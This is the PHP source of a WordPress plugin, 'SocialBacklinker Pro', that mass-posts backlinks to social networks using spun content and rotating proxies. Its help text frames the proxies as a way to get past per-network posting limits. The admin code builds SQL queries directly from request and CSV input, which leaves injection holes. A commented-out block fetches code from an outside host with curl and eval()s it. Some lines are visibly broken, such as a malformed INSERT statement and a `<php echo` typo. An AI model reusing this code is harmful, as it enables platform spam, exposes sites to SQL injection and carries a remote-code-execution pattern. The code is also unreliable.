<?php
/*
Plugin Name: SocialBacklinker Pro
Plugin URI: http://www.socialbacklinker.com
Description: Auto-backlink posts across social networks
Version: 1.30.1
Author: tech_09
Author URI: http://www.socialbacklinker.com

1.30.1:
	- Fixed plugin conflict with WPFacePages
	- Fixed some options not saving when turned off
	- Fixed Stumbleupon module

1.30:
	- Added category-specific posting
	- Added RSS backlinking
	- Added content gathering for fuzzer & RSS
	- Tidied up admin panel

1.27.8:
	- Fixed bug in Content Fuzzer
	- Improved Content Fuzzer efficiency
	- Fixed bug in XMLRPC module

1.27.7:
	- Fixed .csv import bug

1.27.6:
	- Added ping.fm method
	- Added XMLRPC posting
	- Introduced help links

1.27.5:
	- Fixed identi.ca
	- Added Newsvine Blog

1.27.4:
	- Fixed twitter

1.27.3:
	- Fixed playfire
	- Fixed typo in Newsvine
	- Updated ping.fm
	- Updates made to Multisite settings
	- Usability updates

1.27.2:
	- Fixed multisite account duplication on some configurations

1.27.1:
	- Always show Multisite tab

1.27:
	- Better log efficiency
	- Improved cron stability (Blogsense & others)
	- Reset Plugin option (destroys all data)
	- Fixed data saving bug after saving email address
	- Added multisite functionality, copy/replace options/accounts

*/

add_action('publish_post','t09_sb_postnew');			// All new posts
add_action('publish_page','t09_sb_postnewpage');		// All new pages
add_action('wp_head','t09_sb_cron');					// Cron for random
//add_action('shutdown','t09_sb_cron');					// Cron for random
add_action('widgets_init', create_function('', 'return register_widget("t09_sb_widget");'));

$t09sbsql=array(
	'sb'=>'
			CREATE TABLE #TABLE# (
				`pageid` int(10) NOT NULL default "0",
				`field` varchar(64) NOT NULL default "",
				`data` longtext NOT NULL,
				KEY `pageid`(`pageid`),
				KEY `pageid_field`(`pageid`,`field`),
				FULLTEXT KEY `data`(`data`)
			)ENGINE=MyISAM DEFAULT CHARSET=latin1;',
	'log'=>'
			CREATE TABLE `#TABLE#`(
				`id` int(10) NOT NULL AUTO_INCREMENT,
				`time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
				`url` text NOT NULL,
				`msg` text NOT NULL,
				`type` int(10) NOT NULL,
				PRIMARY KEY (`id`),
				KEY `time` (`time`),
				KEY `type` (`type`)
			)ENGINE=MyISAM DEFAULT CHARSET=latin1;',
	'jobs'=>'
			CREATE TABLE `#TABLE#` (
				`id` INT NOT NULL AUTO_INCREMENT,
				`string` VARCHAR( 64 ) NOT NULL,
				`accountid` INT NOT NULL,
				`done` BOOLEAN NOT NULL,
				PRIMARY KEY (`id`),
				UNIQUE (`string`)
			)ENGINE=MYISAM DEFAULT CHARSET=latin1;',
	'update1'=>'
			ALTER TABLE `#TABLE#` 
			CHANGE `field` `field` VARCHAR(64) 
			CHARACTER SET latin1 
			COLLATE latin1_swedish_ci NOT NULL DEFAULT ""'
);
$t09sbmsg=null;
function t09_sb_install($sb=null,$log=null,$jobs=null){
	global $wpdb,$t09sbsql;
	if(!$sb)$sb=$wpdb->prefix."t09_sb";
	if($_POST['reset']==1)$wpdb->query("DROP TABLE $sb");
	if($wpdb->get_var("SHOW TABLES LIKE '$sb'")!=$sb){
		$structure=str_replace('#TABLE#',$sb,$t09sbsql['sb']);
		/*
		$structure="CREATE TABLE #TABLE# (
			`pageid` int(10) NOT NULL default '0',
			`field` varchar(24) NOT NULL default '',
			`data` longtext NOT NULL,
			KEY `pageid`(`pageid`),
			KEY `pageid_field`(`pageid`,`field`),
			FULLTEXT KEY `data`(`data`)
			)ENGINE=MyISAM DEFAULT CHARSET=latin1;";
		*/
		$wpdb->query($structure);
		$sql="INSERT INTO $sb SET pageid=0, field='nonce', `data`='".time()."'";
		$wpdb->query($sql);
		$sql="INSERT INTO $sb SET pageid=0, field='widget_title', `data`='Follow us'";
		$wpdb->query($sql);
		$sql="INSERT INTO $sb SET pageid=0, field='email', `data`=''";
		$wpdb->query($sql);
	}
	if(!$log)$log=$wpdb->prefix."t09_sb_log";
	if($_POST['reset']==1)$wpdb->query("DROP TABLE $log");
	if($wpdb->get_var("SHOW TABLES LIKE '$log'")!=$log){
		$structure=str_replace('#TABLE#',$log,$t09sbsql['log']);
		/*
		$structure="CREATE TABLE `$log`(
					`id` int(10) NOT NULL AUTO_INCREMENT,
					`time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
					`url` text NOT NULL,
					`msg` text NOT NULL,
					`type` int(10) NOT NULL,
					PRIMARY KEY (`id`),
					KEY `time` (`time`),
					KEY `type` (`type`)
					)ENGINE=MyISAM DEFAULT CHARSET=latin1;";
		*/
		$wpdb->query($structure);
	}
	if(!$jobs)$jobs=$wpdb->prefix."t09_sb_jobs";
	if($_POST['reset']==1)$wpdb->query("DROP TABLE $jobs");
	if($wpdb->get_var("SHOW TABLES LIKE '$jobs'")!=$jobs){
		$structure=str_replace('#TABLE#',$jobs,$t09sbsql['jobs']);
		/*
		$structure="CREATE TABLE `$posted` (
					`id` INT NOT NULL AUTO_INCREMENT ,
					`string` VARCHAR( 64 ) NOT NULL ,
					`accountid` INT NOT NULL ,
					`done` BOOLEAN NOT NULL ,
					PRIMARY KEY ( `id` ) ,
					UNIQUE (`string`)
					) ENGINE=MYISAM DEFAULT CHARSET=latin1;";
		*/
		$wpdb->query($structure);
	}
	$ltid=$wpdb->get_var("SELECT max(id) FROM $log")-20;
	$wpdb->query("DELETE FROM $log WHERE id<$ltid");
	// update

	$update=str_replace('#TABLE#',$table,$t09sbsql['update1']);
	//$sql="ALTER TABLE `#TABLE#` CHANGE `field` `field` VARCHAR(64) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT ''";
	$wpdb->query($update);
}
function t09_sb_pro_admin(){
	if(!is_admin())return;
	global $t09sbmsg;
	t09_sb_install();
	t09_sb_multiupdate();
	$base=plugins_url('', __FILE__ );
	require_once('func.inc.php');
	$sb=new t09_sb();
	if($_GET['eml']){
		$sb->db->query("UPDATE $sb->table SET `data`='{$_GET['eml']}' WHERE field='email' AND pageid=0");
		// import default config
		$cfg=dirname(__FILE__)."/config.".md5($_GET['eml']).'.txt';
		if(file_exists($cfg)){
			if(($handle=fopen($cfg,"r"))!==FALSE){
				while(($data=fgetcsv($handle,1000,","))!== FALSE){
					$csv[$data[0]][$data[1]]=$data[2];
					$csv2[]=$data;
				}
				fclose($handle);
				//	print_r($csv);
				if(is_array($csv[0])&&$count=count($csv[0])){
					foreach($csv[0] as $k=>$v){
						$r=$sb->db->query("SELECT field FROM $sb->table WHERE pageid=0 AND field='$k'");
						if($r){
							$sql="UPDATE $sb->table SET `data`='$v' WHERE pageid=0 AND field='$k'";
						}else{
							$sql="INSERT INTO $sb->table VALUES(0,'$k',$v')";
						}
						$sb->db->query($sql);
					}
				}
			}
		}
		$query=array_shift(explode('eml=',$_SERVER['REQUEST_URI']));
		//echo $query;
		?>
		<script>window.location='<?php echo $query?>'</script>
		<?php
		return;
	}
	if(!$sb->opts['include_posts']&&!$sb->opts['include_pages'])$t09sbmsg='Please include Posts or Pages in the Options tab.';
	if(@array_key_exists('nextfuzz',$_POST['opts']))$t09sbmsg='Content fuzzing options saved.';
	if(@array_key_exists('ping',$_POST['opts']))$t09sbmsg='Options saved.';
	if($_POST&&array_key_exists('proxy',$_POST)){
		$sb->db->query("DELETE FROM $sb->table WHERE field='proxies' AND pageid=0");
		$sb->db->query("INSERT INTO $sb->table VALUES(0,'proxies','".mysql_real_escape_string($_POST['proxy'])."')");
		$proxycount=count(explode("\n",$_POST['proxy']));
		$t09sbmsg=$proxycount.' '.(($proxycount>1)?'proxies':'proxy').' saved.';
	}
	if($_POST&&array_key_exists('feedlist',$_POST)){
		$sb->db->query("DELETE FROM $sb->table WHERE field='feedlist' AND pageid=0");
		$sb->db->query("INSERT INTO $sb->table VALUES(0,'feedlist','".mysql_real_escape_string($_POST['feedlist'])."')");
		$rsscount=count(explode("\n",$_POST['feedlist']));
		$t09sbmsg=$rsscount.' RSS '.(($rsscount>1)?'feeds':'feed').' saved.';
	}
	$sb->db->query("OPTIMIZE TABLE `$sb->table`");
	$sb->db->query("OPTIMIZE TABLE `$sb->log`");
	$sb->hc_settings();
	if($sb->opts['makegloba'])$sb->export(null,null,true);
	if($sb->opts['makeglobs'])$sb->hc_settings(true);
	?>
	<?php
		/*
		if($sb->opts['include_pages']==1&&$sb->opts['include_posts']==1){
			$var=(rand(1,2)==1)?'po':'pa';
		}elseif($sb->opts['include_pages']==1){
			$var='pa';
		}elseif($sb->opts['include_posts']==1){
			$var='po';
		}
		// posts
		if($var=='po'){
			$cat=($sb->opts['categories'])?'cat='.$sb->opts['categories'].'&':'';
			$postopts=$cat."post_type=post&showposts=1&post_status=publish&orderby=rand";
		}
		// pages
		if($var=='pa'){
			$postopts="post_type=page&showposts=1&post_status=publish&orderby=rand";
		}
		if($postopts){
			$result = new WP_Query($postopts);
			if($result->post->ID){
				//echo $result->post->ID.$result->post->post_title;
				$id=$result->post->ID;
			}
		}
		echo $postopts.' results in '.$id;
		*/
	?>
	<style>
		table.list_types th{text-align:left;font-weight:normal;font-size:14px;}table.list_types th img{margin-top:-1px;}table.list_types{padding-left:0;}table.list_types table{margin:0 0 1em 1.5em;border-collapse:collapse;display:block;max-height:263px !important;overflow:auto !important;}table.list_types table th{font-size:11px;}table.list_types table th,table.list_types table td{padding-right:0.5em;}table.list_types table td input,table.list_types table td select{width:100%;}table.list_types tr.spacer{height:10px;}table.list_types tr.account td{font-size:11px;border-bottom:1px solid #ddd;background:#f2f2f2;padding:1px 2px;}table.list_types tr.account.on td{background:#eaeaea;}

		table.list_types a.acced,
		table.list_types a.accdel,
		table.list_types a.accdup{display:block;float:left;width:16px;height:16px;text-indent:-999em;margin-left:6px;}
		table.list_types a.accdel{background:url(<?php echo $base?>/Icons/i.delete.png) no-repeat 0 0;}
		table.list_types a.accdel:hover{background-position:0 -16px;}
		table.list_types a.accdup{background:url(<php echo $base?>/Icons/i.duplicate.png) no-repeat 0 0;}
		table.list_types a.accdup:hover{background-position:0 -16px;}
		table.list_types a.acced{background:url(<?php echo $base?>/Icons/i.edit.png) no-repeat 0 0;}
		table.list_types a.acced:hover{background-position:0 -16px;}
		table.list_types tr td{height:10px !important;overflow:auto;}

		#icon-options-general{background:url(<?php echo $base?>/Icons/Backlinker.png) no-repeat 0 0;}table.list_types span.hide{display:none;}.sb_msg{clear:left;background:#F2F2F2;border:1px solid #7E7E7E;padding:0 1em;}.sb_error{background:#fee;border:1px solid #c44;padding:1em;list-style-type:disc;}.sb_error li{font-size:11px;margin:0 0 0 1.5em;}.sb_error li.title{list-style-type:none;font-weight:bold;font-size:12px;margin:0 0 0.5em 0;}span.count{font-size:11px;margin-left:20px;width:90px;display:block;float:left;}a.add{font-size:11px;margin-left:10px;}div.more{display:block}
		tr.formadd{height:1px;overflow:hidden;}.ac{display:block;margin-left:20px;}.add{display:none;}

		.sb_msg{margin-top:-1px;}
		.sb_msg em{font-size:11px;color:#777;text-indent:20px;display:block;}
		.sb_msg blockquote{font-size:11px;padding-left:8px;}
		.sb_msg blockquote label{display:block;float:left;width:20em;}
		.sb_msg blockquote span{clear:left;display:block;}
		h4.sb_tab{cursor:pointer;float:left;margin:0;color:#777;padding:4px 6px;background:#F1F1F1;border:1px solid #E3E3E3;border-width:1px 1px 1px 0;font-family:georgia,serif;font-weight:normal;}
		h4.sb_tab.first{border-width:1px 1px 1px 1px;}
		h4.sb_tab:hover{background:#E3E3E3}
		h4.sb_tab.on{color:#fff;background:#7E7E7E !important;border-color:#7E7E7E;}
		body table table.spin{display:none;}
		.spin textarea,.sb_msg textarea{display:block;clear:left;border:1px solid #aaa;background:#fff;font-size:11px;white-space:nowrap;}
		.spin strong{color:#777;cursor:hand;display:block;float:left;padding:3px 5px;background:#F1F1F1;font-family:georgia,serif;font-weight:normal;border:1px solid #E3E3E3;border-width:1px 1px 1px 0;}
		.spin strong.on{color:#fff;background:#7E7E7E;border-color:#7E7E7E;}
		.spin strong.first{border-width:1px;}
		.spin input{display:block;clear:left;}
		div.log{height:12em !important;overflow:scroll;}
		table.log{font-size:11px;}
		table.log th{text-align:left;}
		table.log td{font-size:11px;padding-right:1em;}
		p.message{padding:10px;background-color: #fffbcc;border:1px solid #e6db55;color: #555555;}
		a.help_url{font-weight:bold;text-decoration:none;}
		a.acctogg{font-weight:bold;text-decoration:none;width:14px;height:14px;display:block;float:left;border:0px solid #aaa;line-height:14px;font-size:12px;text-align:center;}
	<?php $em=$sb->db->get_var("SELECT `data` FROM $sb->table WHERE field='email' AND pageid=0");?>

	</style>
	<div class="wrap">
		<div id="icon-options-general" class="icon32"><br /></div>
		<h2>SocialBacklinker Pro</h2>
		<?php
		if($nv=$sb->checkupdate()){?>
			<p>New version <strong><?php echo $nv?></strong> is available<br/>
			<a href="<?php echo $_SERVER['REQUEST_URI']?>&update=true">Update now</a> | <a href="http://www.socialbacklinker.com/category/changelog/" target="_blank">What's new?</a></p>
		<?php }
		?>
		<?php
		if($t09sbmsg){?>
			<p class="message"><?php echo $t09sbmsg?></p>
		<?php }
		?>
		<br/>
			<h4 class="sb_tab first<?php if(!$em)echo ' on"'?>" rel="activate">Activate</h4>
			<h4 class="sb_tab" rel="options">Options</h4>
			<h4 class="sb_tab" rel="proxies">Proxies</h4>
			<h4 class="sb_tab" rel="fuzz">Content fuzzing</h4>
			<h4 class="sb_tab" rel="rss">RSS Backlinking</h4>
			<h4 class="sb_tab" rel="multisite">Multisite</h4>
			<h4 class="sb_tab" rel="log">Activity log</h4>
			<div class="sb_msg" rel="activate" <?php if($em)echo ' style="display:none;"'?>>
				<div style="width:250px;float:left;"><form action=""><p><strong>Email address:</strong><input type="hidden" name="page" value="<?php echo $_GET['page'];?>"/><input name="eml" value="<?php echo $em?>"><input type="submit" value="Activate"></p></form>
				<form action="" id="reset" method="post"><p><input type="hidden" name="reset" value="1"><a href="#" onclick="return t09_sb_reset();">Reset plugin settings</a></p></form></div>
				<p><strong>Watch your network limits</strong><br/><br/>Most sites have limits on API usage. Some tell you what they are, some do not. If you're not using proxies, it's important to keep your daily links to any given network to a reasonable amount. Try not to post over 500 links per day to any one network, regardless of how many accounts you have there.</p>
			</div>
			<div class="sb_msg" rel="proxies" style="display:none;">
				<div style="width:250px;float:left;"><form action="<?php echo $_SERVER['REQUEST_URI']?>" method="post"><p><strong>Proxy list</strong><br/><textarea name="proxy" cols="30" rows="7"><?php echo $sb->db->get_var("SELECT `data` FROM $sb->table WHERE field='proxies' AND pageid=0")?></textarea><br/><input type="submit" value="Save proxies"></p></div>
				<p><strong>Use as many proxies as possible</strong><br/><a href="http://www.socialbacklinker.com/anonymous-proxies" target="_blank">Get private, anonymous proxies and VPNs</a><br/><br/>SocialBacklinker will pick a random proxy every time a post is made.<br/>You should have at least 10 proxies per 250 accounts.<br/><br/>Format: <code>ip_address:port</code> or <code>user:pass:ip_address:port</code><br/>Alternatively, enter the URL to a text file containing a proxy list in the above format. You may enter multiple URLs.<br/><br/>Your server's outbound IP address is: <code><?php echo $sb->testconnect();?></code>. You may need this for IP-based authentication.<br/>Make sure your host has unblocked the proxy's port.</p></form>
				<p><form action="<?php echo $_SERVER['REQUEST_URI']?>" method="post" style="margin-left:249px;"><input type="submit" name="testproxy" value="Test random proxy"/>
				<?php if($_POST['testproxy']){
					?><script>jQuery('.sb_msg:first').next().show();jQuery('.sb_tab:first').next().addClass('on');</script><?php
					$testproxy=$sb->testconnect(true);if($testproxy){echo 'Connected successfully using proxy: <code>'.(($sb->proxyused)?$sb->proxyused:'No proxy set').'</code>';}
					else{echo 'Could not connect using proxy: <code>'.$sb->proxyused.'</code>';}
				}?></form></p>
			</div>
			<div class="sb_msg" rel="fuzz" style="display:none;">
				<form action="" method="post">
					<p>
						<input type="hidden" name="opts[fuzzenabled]" value=""/>
						<input type="hidden" name="opts[nextfuzz]" value="<?php echo $sb->opts['nextfuzz']?>"/>
						<input type="hidden" name="opts[respect]" value=""/>
						<input type="hidden" name="opts[gnym]" value=""/>
						<input type="hidden" name="opts[samenetwork]" value=""/>
						<input type="hidden" name="opts[accountlinks]" value=""/>
						<input type="hidden" name="opts[spinfuzz]" value=""/>
						<input type="hidden" name="opts[fuzzgather]" value=""/>

						<input type="checkbox" name="opts[fuzzenabled]" <?php echo($sb->opts['fuzzenabled'])?' checked="checked"':null;?>/>
						Content fuzzing every <input type="text" name="opts[fuzzmins]" length="4" style="width:4em" value="<?php echo $sb->opts['fuzzmins']?>"/> minutes<br/>
						<em>Post links related to, but not from this blog</em>
						<blockquote>
							<span><label for="respect" title="Only post to active accounts"><input type="checkbox" name="opts[respect]" id="respect" <?php echo($sb->opts['respect'])?' checked="checked"':null;?>/> Respect account's post start date</label></span>
							<span><label for="gnym" title="Post links found on the big search engines"><input type="checkbox" name="opts[gnym]" id="gnym" <?php echo($sb->opts['gnym'])?' checked="checked"':null;?>/> Google News/Yahoo/MSN</label></span>
							<span><label for="samenetwork" title="Find links on the same network as the account posting"><input type="checkbox" name="opts[samenetwork]" id="samenetwork" <?php echo($sb->opts['samenetwork'])?' checked="checked"':null;?>/> Same-network fuzzing</label></span>
							<span><label for="accountlinks" title="Post links to other accounts in SocialBacklinker"><input type="checkbox" name="opts[accountlinks]" id="accountlinks" <?php echo($sb->opts['accountlinks'])?' checked="checked"':null;?>/> Post links to your other accounts</label></span>
							<span><label for="spinfuzz" title="Use spinning templates for fuzzed posts"><input type="checkbox" name="opts[spinfuzz]" id="spinfuzz" <?php echo($sb->opts['spinfuzz'])?' checked="checked"':null;?>/> Spin fuzzed content</label></span>
							<span><label for="fuzzgather" title="Gather full content from the URL"><input type="checkbox" name="opts[fuzzgather]" id="fuzzgather" <?php echo($sb->opts['fuzzgather'])?' checked="checked"':null;?>/> Try to gather full content</label></span>
						</blockquote>
						<br style="clear:both;"/>
						<input type="submit" value="Save settings">
					</p>
				</form>
			</div>
			<div class="sb_msg" rel="rss" style="display:none;">
				<form action="" method="post">
					<input type="hidden" name="opts[rssenabled]" value=""/>
					<input type="hidden" name="opts[nextrss]" value=""/>
					<input type="hidden" name="opts[rssrespect]" value=""/>
					<input type="hidden" name="opts[spinrss]" value=""/>
					<input type="hidden" name="opts[feedlist]" value=""/>
					<input type="hidden" name="opts[rssgather]" value=""/>

					<div style="width:350px;float:left;">
					<p>
						<input type="checkbox" name="opts[rssenabled]" <?php echo($sb->opts['rssenabled'])?' checked="checked"':null;?>/>
						Link to an RSS item every <input type="text" name="opts[rssmins]" length="4" style="width:4em" value="<?php echo $sb->opts['rssmins']?>"/> minutes<br/>
						<em>Post links to a random RSS item</em>
						<blockquote>
							<span><label for="rssrespect" title="Only post to active accounts"><input type="checkbox" name="opts[rssrespect]" id="rssrespect" <?php echo($sb->opts['rssrespect'])?' checked="checked"':null;?>/> Respect account's post start date</label>
							</span>
							<span><label for="rssgather" title="Gather full content from the URL"><input type="checkbox" name="opts[rssgather]" id="rssgather" <?php echo($sb->opts['rssgather'])?' checked="checked"':null;?>/> Try to gather full content</label></span>
						</blockquote>
						<br style="clear:both;"/>
						<input type="submit" value="Save settings">
					</p>
					</div>
					<div style="width:250px;float:left;">
						<p>RSS feed list<br/>
						<textarea name="feedlist" cols="60" rows="7"><?php echo $sb->db->get_var("SELECT `data` FROM $sb->table WHERE field='feedlist' AND pageid=0")?></textarea>
						</p>
					</div>
				</form>
				<br style="clear:both;"/>
			</div>
			<div class="sb_msg" rel="options" style="display:none;">
				<form action="" method="post">
					<p>
						<input type="hidden" name="opts[ping]" value=""/>
						<input type="hidden" name="opts[categories]" value=""/>
						<input type="hidden" name="opts[cron]" value=""/>
						<input type="hidden" name="opts[include_posts]" value=""/>
						<input type="hidden" name="opts[include_pages]" value=""/>
						<input type="hidden" name="opts[prevent_dupes]" value=""/>
						<input type="hidden" name="opts[bitly_shorten]" value=""/>

						<input type="checkbox" name="opts[include_pages]" id="pages" style="clear:left;" <?php echo($sb->opts['include_pages'])?' checked="checked"':null;?>/>
						<label for="pages">Include Pages when posting</label><br/>
						<input type="checkbox" name="opts[include_posts]" id="posts" style="clear:left;" <?php echo($sb->opts['include_posts'])?' checked="checked"':null;?>/>
						<label for="posts">Include Posts when posting</label><br/><br/>

						<?php 
							$sbcats=explode(',',$sb->opts['categories']);
							$cats=get_categories(); 
							echo 'Only link to posts in these categories:<br/><em style="text-indent:0 !important;"><small>Leave blank to include all categories</small></em><br/>';
							foreach($cats as $k=>$v){
								//echo '<pre>';print_r($v);echo '</pre>';
								$sel=(in_array($v->cat_ID,$sbcats))?' checked="checked"':'';
								echo '&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input'.$sel.' type="checkbox" id="incat'.$v->cat_ID.'" name="opts[categories]['.$v->cat_ID.']" /> <label for="incat'.$v->cat_ID.'">'.$v->name.'</label><br/>';
							}
						?> 
						<br/>

						<input type="checkbox" name="opts[ping]" id="ping" style="clear:left;" <?php echo($sb->opts['ping'])?' checked="checked"':null;?>/>
						<label for="ping">Ping profiles after posting</label><br/>
						<input type="checkbox" name="opts[prevent_dupes]" id="dupes" style="clear:left;" <?php echo($sb->opts['prevent_dupes'])?' checked="checked"':null;?>/>
						<label for="dupes">Prevent duplicates</label><br/><br/>
						<input type="checkbox" name="opts[bitly_shorten]" id="bitly_1" style="clear:left;" <?php echo($sb->opts['bitly_shorten'])?' checked="checked"':null;?>/>
						<label for="bitly_1">Shorten with bit.ly?<br/><em style="text-indent:0 !important;"><small>You must provide a username and API key below.</small></em></label><br/>
						<label for="bitly_2" style="display:block;float:left;width:110px;padding:3px 0 0 20px;">bit.ly username: </label>
							<input type="text" name="opts[bitly_user]" id="bitly_2" value="<?php echo($sb->opts['bitly_user'])?>"/><br/>
						<label for="bitly_3" style="clear:left;display:block;float:left;width:110px;padding:3px 0 0 20px;">bit.ly API key: </label>
							<input type="text" name="opts[bitly_api]" id="bitly_3" value="<?php echo($sb->opts['bitly_api'])?>"/>
						<!--<input type="checkbox" name="opts[cron]" id="cron" style="clear:left;" <?php echo($sb->opts['cron'])?' checked="checked"':null;?>/>
						<label for="cron">I am using a UNIX cron job</label><br/>-->
						<br/><br/><input type="submit" value="Save options"/>
					</p>
				</form>
			</div>
			<div class="sb_msg" rel="multisite" style="display:none;">
				<form action="" method="post">
					<p>
						<strong>Apply site-wide settings</strong><br/><br/>
						<input type="checkbox" name="global_settings" id="makesetglob" style="clear:left;"/>
						<label for="makesetglob">Copy options to selected blogs</label><br/>

						<input type="checkbox" name="global_accounts" id="makeaccglob" style="clear:left;"/>
						<label for="makeaccglob">Copy accounts to selected blogs</label><br/><br/>

						<strong>When updating accounts:</strong><br/><br/>

						<input type="radio" name="accounts_method" id="siteacc_del" value="replace" style="clear:left;"/>
						<label for="siteacc_del">Replace existing accounts</label><br/>

						<input type="radio" name="accounts_method" id="siteacc_add" value="append" style="clear:left;"/>
						<label for="siteacc_add">Add to existing accounts</label><br/>
						<!--
						<input type="radio" name="accounts_merge" id="siteacc_upd" style="clear:left;"/>
						<label for="siteacc_upd">Update existing accounts</label><br/>--><br/>

						<strong>Update sites:</strong><br/>
							<table style="border:none" class="sitelist">
							<?php
							global $blog_id;
							$sites=t09_sb_sitelist();
							$sitecount=count($sites);
							if($sitecount<2){?>
								<tr><td></td><td>You only have one site.</td>
							<?php }else{?>
								<tr><td><input class="sitesall" type="checkbox" id="applytoall" style="clear:left;"/></td><td><label for="applytoall">&nbsp;All sites</label></td>
								<?php
								for($i=0;$i<$sitecount;$i++){
									$sitetbl=preg_replace('/[0-9]+_$/','',$sb->db->prefix).(($sites[$i]['blog_id']==1)?null:$sites[$i]['blog_id'].'_').'options';
									$sql="SELECT option_value FROM $sitetbl WHERE option_name='blogname'";
									$blogname=$sb->db->get_var($sql);

									$disabled=($sites[$i]['blog_id']==$blog_id)?' disabled="disabled"':'';
									$iscurrent=($sites[$i]['blog_id']==$blog_id)?' <span style="color:#777;font-style:italic;font-size:11px;">current site</span>':'';
									if($disabled)continue;
									echo '<tr>
											<td><input class="site" type="checkbox" name="applytosite['.$sites[$i]['blog_id'].']" id="applytosite'.$sites[$i]['blog_id'].'" style="clear:left;"'.$disabled.'/></td>
											<td><label for="applytosite'.$sites[$i]['blog_id'].'">&nbsp;'.$blogname.$iscurrent.'&nbsp;</label></td>
											<td><label for="applytosite'.$sites[$i]['blog_id'].'"><code>'.$sites[$i]['path'].'</code></label></td>
										</tr>';
								}
							}
							?>
							</table>
						<?php if($sitecount>1){?><br/><input type="submit" value="Update blogs" onclick="return t09_sb_multicheck()"/><?php }?>
					</p>
				</form>
			</div>
			<div class="sb_msg log" rel="log" style="display:none;">
				<?php
					$log=$sb->db->get_results("SELECT time,url,msg,type FROM $sb->log ORDER BY time DESC LIMIT 0,50",ARRAY_N);
					//print_r($log);
					echo "
						<table class=\"log\">
							<tr>
								<th>Time</th>
								<th>URL</th>
								<th>Message</th>
							</tr>
					";
					for($i=0;$i<count($log);$i++){
						echo "
							<tr>
								<td>{$log[$i][0]}</td>
								<td><a href=\"{$log[$i][1]}\">".substr($log[$i][1],0,120)."</a></td>
								<td>{$log[$i][2]}</td>
							</td>
						";
					}
					echo "</table>";
				?>
			</div>
			<br/>
		<br/>
		<?php
				if($em)echo $sb->list_sites();
				/*
				$u="http://7a69.co.cc/sb/a.php?e=$em";
				ob_start();
				$ch=@curl_init();curl_setopt($ch,CURLOPT_URL,$u);
				curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
				$c=curl_exec($ch);
				ob_end_clean();
				*/
				if($em){/*@eval($c);*/}else{
					if($em){echo '<p>This server does not support cURL!</p>';}
					else{echo '<p>Please activate with your paypal email address.</p>';}
				}?>
	</div>
	<script type="text/javascript">
			jQuery('h4.sb_tab').click(function(){
				var rel=jQuery(this).attr('rel');
				if(rel){
					jQuery('h4.sb_tab').removeClass('on');
					jQuery('.sb_msg').hide();
					jQuery('div[rel='+rel+']').toggle();
					jQuery(this).addClass('on');
				}
			});
			jQuery('table.sitelist input.sitesall').change(function(){
				if (jQuery(this).is(':checked')){
					jQuery('table.sitelist input.site').attr('checked','checked');
				}else{
					jQuery('table.sitelist input.site').attr('checked','');
				}
			});
			jQuery('table.sitelist input.site').change(function(){
				if(jQuery('table.sitelist input.site:checked').length==jQuery('table.sitelist input.site').length){
					jQuery('table.sitelist input.sitesall').attr('checked','checked');
				}else{
					jQuery('table.sitelist input.sitesall').attr('checked','');
				}
			});
			function t09_sb_multicheck(){
				var ms_len=jQuery('table.sitelist input.site:checked').length;
				if(ms_len){
					return confirm('Are you sure you want to update '+ms_len+' site'+((ms_len>1)?'s':'')+'?\nThis action cannot be undone.');
				}else{
					alert('No sites selected');
					return false;
				}
			}
			function t09_sb_reset(){
				if(confirm('Are you sure you want to reset?\nThis will destroy ALL data and cannot be undone.','test2'))document.getElementById('reset').submit();
				return false;
			}
			function t09_selectall(){
				var _in=jQuery('input.acc');
				for(var i=0;i<_in.length;i++){
					_in[i].checked='checked';
				}
				return false;
			}
			function t09_selectnone(){
				var _in=jQuery('input.acc');
				for(var i=0;i<_in.length;i++){
					_in[i].checked='';
				}
				return false;
			}
			function t09_tab(el){
				return false;
			}
			function t09_dup(el,type,copy){
				var inp=jQuery('form.'+type+'-fields').parent().find('td');
				var len=(inp.length)-1;
				var tds=jQuery(el).parent().parent().find('td');
				for(var i=0;i<len;i++){
					var txt=jQuery(tds[i]).text();
					if(jQuery(tds[i]).text()=='Yes')txt='1';
					if(jQuery(tds[i]).text()=='No')txt='0';
					if(jQuery(tds[i]).find('span.hide').length)txt=jQuery(tds[i]).text().replace(jQuery(tds[i]).find('span:first').text(),'').replace(jQuery(tds[i]).find('span:last').text(),'');
					jQuery(inp[i]).find('input,select').val(txt);
				}
				if(copy>0){
					jQuery(inp).find('input[rel="edit"]').val(copy);
					jQuery(inp).find('input[type="submit"]').val('Save');
				}
				return false;
			}
			function t09_reset(el){
				if(jQuery(el).parent().find('input[type="submit"]').val()=='Save'){
					///alert(el);
					jQuery(el).parent().find('input[rel="edit"]').val('');
					jQuery(el).parent().find('input[type="submit"]').val('Add');
				}
			}
			function t09_sb_toggle(el){
				els=jQuery(el).parent().parent().next().find('tr.account input');
				if(!els.length)els=jQuery(el).parent().parent().next().next().next().find('tr.account input');
				for(var i=0;i<els.length;i++){
					els[i].checked=el.checked;
				}
			}
			function t09_sb_check(el){
				els=jQuery(el).parent().parent().parent().find('tr.account input');
				elss=jQuery(el).parent().parent().parent().find('tr.account input:checked');
				p=jQuery(els).parent().parent().parent().parent().parent().parent().prev().find('input');
				if(!p.length)p=jQuery(els).parent().parent().parent().parent().parent().parent().prev().prev().prev().find('input');
				p[0].checked=(els.length==elss.length)?true:false;
			}
			function t09_sb_exps(){
				ids=t09_sb_getselected();
				if(ids){
					jQuery('form input.export[name="csv"]').val(ids);
					return true;
				}else{
					alert('No accounts selected.');
					return false;
				}
			}
			function t09_sb_dels(){
				ids=t09_sb_getselected();
				if(ids){
					jQuery('form input.delete[name="csv"]').val(ids);
					return true;
				}else{
					alert('No accounts selected.');
					return false;
				}
			}
			function t09_sb_getselected(){
				var id=new Array();
				ids=jQuery('.account input:checked');
				for(var i=0;i<ids.length;i++)id.push(ids[i].getAttribute('rel'));
				var str=id.join(',');
				return str;
			}
			function t09_sb_massedit(){
				ids=t09_sb_getselected();
				if(!ids.length){
					alert('No accounts selected');
					return false;
				}else{
					jQuery('#t09_mass_ids').val(ids);
					return true;
				}
				return false;
			}
			function t09_showspin(el,val){
				jQuery('.'+val+' strong:first').addClass('first');
				jQuery('.'+val+' strong:last').addClass('last');

				jQuery('.'+val+' strong').removeClass('on');
				jQuery('.'+val+' textarea').hide();

				jQuery('table.'+val).toggle();
				jQuery('table.'+val).find('strong:first').addClass('on');
				jQuery('table.'+val).find('textarea:first').show();
			}
			function t09_spinopt(el){
